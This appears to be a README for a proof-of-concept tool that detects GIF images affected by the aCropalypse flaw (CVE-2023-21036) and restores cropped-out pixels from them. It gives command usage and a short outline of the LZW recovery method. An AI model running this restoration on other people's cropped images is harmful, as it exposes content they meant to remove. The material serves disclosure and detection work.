aCropalypse（CVE-2023-21036）related GIF PoC. The aCropalypse reported affects PNG, but a similar exploit exists in GIF images.

This is original GIF Image case02.gif.

And crop image case02_crop.gif using aCropalypse affected software.

Execute acropalypse-gif restore

$ acropalypse-gif restore asset/case02_crop.gif 688 634
asset/case02_crop.gif-restored.gif

cargo build --release

Detect aCropalypse gif image.

acropalypse-gif detect <filepath>

# undetected
$ acropalypse-gif detect asset/case01.gif

# detected
$ acropalypse-gif detect asset/case01_crop.gif
asset/case01_crop.gif

Restore partical gif image from aCropalypse affected gif image.

acropalypse-gif restore <filepath> <width> <height>

# restore case01.gif
$ acropalypse-gif restore asset/case01_crop.gif 619 232
asset/case01_crop.gif-restored.gif

docker compose run --rm acropalypse-gif detect asset/case01_crop.gif
docker compose run --rm acropalypse-gif restore asset/case01_crop.gif 619 232

• Exploit Detail
  • Exploit Detail (Japanese)

• Search Image Data Sub-block. It may be start 0xFF and verify GIF Image Data format.
• Search 12bit Clear Code of LZW compression(GIF). It may be 0b000100000000.
• Decompress LZW after Clear Code.
• Encode image using cropped image palette.